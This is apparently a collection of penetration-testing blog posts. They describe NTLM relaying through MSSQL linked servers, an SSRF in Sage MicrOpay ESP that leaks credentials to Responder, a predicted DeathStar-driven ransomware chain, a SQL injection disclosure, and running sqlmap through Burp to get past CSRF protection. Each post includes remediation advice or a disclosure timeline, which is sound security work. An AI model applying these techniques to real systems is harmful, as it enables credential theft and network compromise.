NTLM Relay Backflips

A little while back we were conducting an application security test for a client, when we managed a fun little backflip with NTLM credential relaying that we felt was worth sharing.

The application was at first glance quite unremarkable. A fairly typical Windows thick client, an application server, and a back-end MSSQL database server. As it usually does, the fun started with one of those ‘huh, that’s interesting’ moments. Looking at some XML configuration files in the thick client’s directory we found a handful of base64 encoded values with names like ‘DBUsername’ and ‘DBPassword’, next to some plain-text host names and port numbers. Attempting to decode the base64 resulted in illegible binary garbage, so they were obviously encrypted. It seems likely that the application developers assumed that an attacker would give up at this point, but we are nothing if not stubborn, and our thinking was that if the client software was able to decrypt these credentials, and we had a copy of the client, we MUST be able to decrypt them as well.

Initially we braced ourselves for a tedious reverse-engineering process, but were quickly relieved to find that the relevant binaries were all managed .NET, meaning we were able to simply decompile them back to extremely legible source code. Grepping the source for the string ‘crypt’ very quickly identified the function responsible for the encryption and decryption of our stored database credentials, along with a hard coded key and IV, both of which were based very closely on the name of the software vendor.

After some short work in python reimplementing the decryption function from the application, we were the proud owners of some shiny new database credentials, but what could we do with them? Logging into the MS SQL Server instance we found that even though this WAS the same server used by the application for its main database, the credentials we had were only able to access a smaller, less interesting database on the same server. The client retrieved its most sensitive data using a more traditional approach, i.e. via an application layer server with its own back-end connection to the database.

‘xp_cmdshell’, that eternal hacker favourite, was not available to our user. If we wanted to find a way to pop the database server itself we were going to need to get at least a little bit creative.

Next we tried another classic trick using a different extended stored procedure, ‘xp_dirtree’. xp_dirtree essentially asks the SQL Service instance to provide a directory listing of a given file path. By providing a UNC path directing the server to an attacker-controlled host, one can usually use tools like Responder or ntlmrelayx to capture a NetNTLMv2 hash of the SQL Server service account password, or relay the service account’s credentials and use them to authenticate via SMB to a secondary host. While we were able to capture a hash, the password configured was strong enough to resist our efforts at cracking in the time we had available. Further, we were unable to relay the credential via SMB to any of the in-scope hosts, as all had been configured with SMB signing set to the dreaded ‘REQUIRED’, making our relayed credentials worthless.

Foiled.

But wait! NTLM authentication can be relayed to authenticate for many other protocols, including HTTP and MSSQL! Maybe the usual rules against reflecting NTLM authentication back to the source host wouldn’t apply in a cross-protocol scenario like this? Nope, they still apply.

Foiled again.

At this point we became a little frustrated and went back to basics, digging a little deeper in some earlier reconnaissance data we had acquired, including some gathered using Scott Sutherland’s (@_nullbindon Twitter) amazingly useful PowerUpSQL PowerShell module. PowerUpSQL will enumerate (among many other things) the links between one database server and another. These links are especially common in scenarios where you have a primary ‘operational’ database server and a secondary server which acts as a ‘data warehouse’, with data regularly being groomed from one database and archived in the other, which is exactly the scenario that it identified for us in this case.

Sending queries via the first database to the data warehouse did not immediately yield any particularly useful results. We were similarly low-privileged in the data warehouse, and it was beginning to look like something of a dead end, when we suddenly realised that we already had everything we needed to own the whole box and dice.

First we set up ntlmrelayx to catch SMB authentication attempts against our attacker-controlled host and relay them on to the same MS SQL Server port as before, only this time instead of running xp_dirtree on the first server, we used the database link to send the same xp_dirtree query to the second server. It attempted to connect to our host, which negotiated NTLM authentication and then relayed the authentication attempt back around to the first server’s MS SQL Server port, essentially completing a full loop.

We were back where we started, but now we were authenticated as the SQL Server service account, which had local Administrator privileges on both SQL servers, and thus was granted full ‘sa’ privileges on them as well. With admin access in hand we were able to enable the ‘xp_cmdshell’ extended stored procedure and use it to execute shell commands in the underlying OS as a full admin user. We won’t go into full detail here but after this breakthrough it was a matter of mere minutes before we were able to gain full control of the entire AD/Windows environment.

So, what are the take-home lessons from all of this?

Don’t hard-code credentials and encryption keys into your application configs or binaries. If your security design relies on doing this, you’ve designed it wrong.

Don’t let users log directly into the database server – make them go via an application layer server.

Disable SQL Server extended procedures that aren’t needed, including xp_cmdshell, xp_dirtree, and xp_filexist.

Outbound firewall rules matter almost as much as inbound. If your backend servers don’t need to speak SMB to the client, don’t let them!

… and while SMB signing is an extremely underrated and effective security control, no single security control is ever completely effective in the face of a determined adversary.

Server-side request forgery in Sage MicrOpay ESP

Asterisk Senior Security Consultant Mike Loss shares a story from a testing engagement that was fun for us, moderately bad news for our client and ultimately worse news for a vendor. Spoiler alert – this story has a happy ending.

During a testing engagement last year I was working on a web app called “Sage MicrOpay ESP”. ESP stands for Employee Self-service Portal, and it’s a pretty standard HR web app, allowing employees to enter timesheets, book leave, etc.

Looking at the first handful of requests made by the browser when loading the page, one stood out immediately as… odd.

https://esp.REDACTED.com.au/ESP/iwContentGen.dll/start?InitialPage=100&NOLOGIN=Y&PageReadOnly=N&MAE=N&HAE=N&CommonDatabase=53227%20EvolutionCommon&CommonServer=REDACTED-SQL02&US=03dbbb66-cf9b-46de-97cb-cfa450de93bf

There are a few file extensions that really set the spidey-sense tingling when it comes to web apps. The list is long, but classics include pl, sh, exe, and in this instance, .dll.

Image Source

Looking through the URL parameters in the request, something else stood out – the ‘CommonDatabase’ and ‘CommonServer’ parameters. It seemed pretty odd that the user would be in control of a web app’s database connection. At first I doubted that was what was actually happening but once I noticed that the value in ‘CommonServer’ matched the naming convention of the target organisation’s server fleet, I became more confident that I was on to something.

Put simply, it turns out that one of ESP’s very first actions upon loading was to tell the client’s browser: ‘Hey I need you to tell me to connect to a database server. You should tell me to connect to this one!’.

There’s essentially no reason for a web application of this type to ever ‘ask’ a regular client which database on which server the application should connect to. In any sane application this value would be in a configuration file, somewhere inaccessible to normal users of the application.

So of course I did what any normal tester would do, I threw a bunch of garbage at the interesting parameters to see what would stick.

Most things I tried at first resulted in the request timing out, but we maintain a pet DNS server for just such an occasion. Keeping an eye on the query logs for the server and sending the request again with our DNS name in the ‘CommonServer’ parameter resulted in a lovely sight.

At the very least we have some kind of server-side request forgery in play. The obvious next step for us was to see what else we can get the server to talk to. Internal hosts? Hosts out on the Internet?

The thing clearly wants to talk to a database server… let’s give it a database server. The .dll file extension tells us it’s on Windows, so MSSQL is an obvious place to start.

Starting up a netcat listener on port 1433 on a host in AWS and then sending our DNS name in the ‘CommonServer’ field generated exactly the result we’d hoped for.

So we have a web application on the inside… and it thinks I’m it’s database server…

Image Source

I wonder if I can get it to send me credentials?

The obvious tool for the job here is Responder. It’ll happily impersonate a server, then negotiate and accept more or less any authentication request that a client is willing to send it, then serve up the resulting credentials on a platter.

After repeating the process with Responder in place of our netcat listener, we get some creds!

Fun for us, but moderately bad news for our client.

At this stage I was moderately disappointed by the quality of the very obviously default creds, especially since they were no good to me in terms of further attacks on the target infrastructure.

I started goofing around with the format of the server address, trying out UNC addresses, internal addresses, specifying ports, that kind of thing, and eventually hit on formatting it like this:

…which made my Responder go off like crazy.

Image Source

For those not familiar with NTLM authentication, it APPEARS that the application has interpreted our gently mangled server name as a UNC path, in such a way that it thinks it needs to get to the database via SMB.

As a result, it’s connected to my Responder listener on port 445, and Responder has told it to authenticate via NTLM. The application has kindly obliged and we end up with a NetNTLMv2 hash – that long string of yellow alphanumerics at the end of the image.

Now, a NetNTLMv2 hash is quite a lot slower to crack than a regular NTLM hash if you want to actually recover the password, but if you notice that ‘$’ at the end of where I’ve redacted the username? That means the account being used to authenticate is the AD account of the actual server itself. That means the password is randomly generated and LOOOONG.

Never going to crack it. Just not gonna happen.

What we COULD do however is relay the authentication attempt… IF the target organisation had any services facing the internet that used NTLM authentication AND allowed connections from computer accounts. This might seem unlikely at first, but ‘Authenticated Users’ includes computer accounts, and heaps of sysadmins grant rights to ‘Authenticated Users’ where they should really use ‘Domain Users’. In any case, our target organisation didn’t have anything else with NTLM auth facing the Internet so it’s at this point that the attack becomes kind of academic.

In addition to this particularly entertaining issue, we also identified a number of other issues with the application, including unauthenticated access to staff names, phone numbers, addresses, and other sensitive PII.

After delivering the report to our client we began the least fun part – the disclosure to the vendor.

It turns out that ‘Sage’ is a pretty big company, and finding anyone responsible for infosec matters was non-trivial.

I started with the support email on the website. While the staff at the other end responded very quickly, there seemed to be a breakdown in communications.

Sage support continued to insist that I needed to provide a customer number before they would provide me with any support services. I tried explaining that I wasn’t asking for support services…

And then they stopped replying to my emails. 🙁

So I tried the traditional “security@” email address… Not a peep.

I asked around with some industry contacts… Nobody knew anybody who worked at Sage.

Finally I resorted to what I think of as ‘the Tavis’.

Turns out Tavis is a smart guy (who knew, right?) because this worked… real fast.

Without boring you to death with details, I almost immediately received a phone call from an actual dev, who was actually familiar with the app, and who actually wanted to fix the problem!

I passed through the details, they fixed the issues, and a patch came out about a month later.

Finally, because we’re meant to be trying to actually make things better when we hack stuff, I’d like to go over a quick summary of the ways this could have been prevented.

On the dev side, the most obvious part is that the client should not have ever been given the opportunity to choose the back-end database server. It should have been set in a config file somewhere.

Of course, we can’t expect vendors and developers to always do the right thing. Strict outbound network filtering would’ve prevented both the MSSQL and NTLM credential exposures. Your computers almost certainly do not need to talk to things on the public Internet on tcp/445 and tcp/1433, so don’t let them!

Sage were very helpful and friendly (and appreciative) once I actually made contact with the right group within the company, but getting there was unnecessarily difficult. Monitor your security@ address and publish a contact on your website for vulnerability disclosure.

 

The End is Nigh?

We are not usually in the business of making bold predictions about future developments in cyber security. But recent internal discussions about WannaCry and Petya/Nyetya have got us all thinking about an entirely plausible and frankly terrifying possibility for where crypto malware could go next.

Here’s the short version:
DeathStar + basic crypto malware variant = complete encryption of the entire AD environment.

DeathStar is an extension to the Empire post-exploitation framework that was released by byt3bl33d3r in May 2017. It builds on previous tools like BloodHound to identify and automate privilege escalation within Active Directory. Basically, “push button, receive domain admin”.

DeathStar (and BloodHound) don’t rely on exploiting any actual vulnerabilities. Rather DeathStar leverages Active Directory configuration and allocation of privilege in order to find and exploit a path of domain joined systems that can be travelled, one hop at a time, in order to eventually obtain DA privileges. The BloodHound github page probably explains this approach most succinctly:
“BloodHound uses graph theory to reveal hidden relationships and attack paths in an Active Directory environment.”

Our predicted scenario plays out something like this:
1. Despite your organisation’s best efforts with security education and awareness, a low privileged user opens a malicious executable email attachment.
2. The attachment first runs DeathStar, which eventually obtains domain admin privileges.
3. Once DA has been obtained, the payload reaches out to every domain-joined Windows system and executes a crypto malware payload, as DA, on every host simultaneously.

Taking this one step further…
Couple this attack with a basic password spraying attack against Remote Desktop Services or Citrix  (or even OWA followed up with Ruler) and you remove the need for any phishing or other user interaction. One minute you’re fine – the next minute every machine on your AD has crypto malware.

So what can be done?

  1. Excellent, frequent, offline and offsite backups. Definitely NOT on local, online, domain-joined backup servers.
  2. Proactively test your Active Directory with tools like Bloodhound and DeathStar. If you can prevent these tools from achieving DA through derivative administrator relationships, chances are good that the predicted malware won’t be able to either.
  3. Use cloud-based / SaaS services where possible.
  4. Follow ‘best practice’ advice like the Top 35 / Essential 8 provided by ASD. Specifically: patch OS and applications, implement application whitelisting, use 2FA for all remote access (including OWA), limit the allocation of administrative rights, and monitor the shit out of your environment.

If this prediction eventuates it could have staggering consequences for individual organisations and possibly for the global economy. We don’t want this to happen, but it just seems like the next logical step in the evolution of crypto malware. Hopefully by highlighting the possibility we can get ahead of the curve before the risk is realised.

Vulnerability Disclosure: SQL Injection in Flash Page Flip

During an engagement for one of our clients we came across Flash Page Flip and found that it is vulnerable to SQL Injection. As per our responsible disclosure policy, the creators of Flash Page Flip were contacted to advise them of the issue.

90 days have passed since our initial communication, and we have received no further response. SQL injection is not a new topic. To be more precise, it is a 20th century bug which is supposed to be long gone. The reason we decided to pursue this vulnerability officially (CVE-2015-1556 and CVE-2015-1557) is due to the apparently wide spread use of this application.

googlin

The lack of input validation was noticed across the majority of Flash Page Flip’s code and affected multiple pages such as:

  • NewMember.php
  • GetUserData.php
  • SaveUserData.php
  • DeleteUserData.php
  • /xml/Pages.php

In other instances weak input sanitisation functionality was implemented, before the SQL query was sent to the backend database. Some of the affected pages are listed below:

  • /admin/EditSubCat.php
  • /admin/ViewPage.php
  • /admin/AddMag.php
  • /admin/AddCat.php
  • /admin/EditCat.php

Exploitation of this vulnerability could allow attackers to extract the data used by Flash Page Flip which may be considered not sensitive. However, Flash Page Flip could also be used as a plugin to other CMS platforms and therefore may share the same database, as it happened during our engagement. In this case, SQL Injection may result in exposure to more sensitive CMS data, including credentials.

The full advisory can be found here.

Communication timeline:

  • 27th Jan 2015 – Contacted vendor with initial disclosure
  • 10th Feb 2015 – Contacted vendor with CVE identifiers
  • 29th Apr 2015 – Vulnerability published

Fuzzing and Sqlmap inside CSRF-protected locations (Part 2)

– @dave_au

This is part 2 of a post on fuzzing and sqlmap’ing inside web applications with CSRF protection. In part 1 I provided a walkthough for setting up a Session Handling Rule and macro in Burp suite for use with Burp’s Intruder. In this part, I will walkthrough a slightly different scenario where we use Burp as a CSRF-protection-bypass harness for sqlmap.

Sqlmap inside CSRF

A lot of the process from part 1 of the post is common to part 2. I will only run through the key differences.

Again, you’ll need to define a Session Handling Rule, containing a macro sequence that Burp will use to login to the application, and navigate to the page that you need.

The first real difference is in the definition of scope for the session handling rule. Instead of setting the scope to “Intruder” and “Include all URLs”, you’ll need to set the scope to be “Proxy” and a custom scope containing the URL that you are going to be sqlmapping.

screenshot11

There is a note to “use with caution” on the tool selection for Proxy. It is not too hard to see why – if you scoped the rule too loosely for Proxy, each request could trigger a whole new session login. And then I guess the session login could trigger a session login, and then the universe would collapse into itself. Bad news. You have been warned.

Once the session handling rule is in place, find an in-scope request that you made previously, and construct it into a sqlmap command line.

screenshot12

screenshot13

In this example, I’m attempting an injection into a RESTful URL, so I’ve manually specified the injection point with “*”. I’ve included a cookie parameter that defines the required cookies, but the actual values of the cookies is irrelevant, since Burp will replace these based on the macro.
If it was a POST, you would need to include a similar –data parameter to sqlmap, where Burp would replace any CSRF tokens from hidden form fields. Finally, we have specified a proxy for sqlmap to use (Burp).

Running sqlmap, we start to see it doing it’s thing in the Burp Proxy window.

Screenshot a

That’s pretty much all there is to it.

One catch for the Session Handling Rule / macro configuration is that there isn’t a lot of evidence in the Burp tool (Intruder, Proxy, …) that anything is happening. If you are not getting the results that you would expect, the first thing to check is the Sessions Tracer, which can be found in the Session Handling Rules section. Clicking the “Open sessions tracer” button opens the Session Handling Tracer window. If a session handling rule is triggered, the actions for that rule will start to show up in the Tracer window. You can step through a macro, request by request, to see that everything is in order.

screenshot b

Conclusion

In this two part post, I’ve walked through setting up Burp Suite to do fuzzing inside CSRF-protected applications, both with Burp’s own Intruder tool and using an external tool (sqlmap).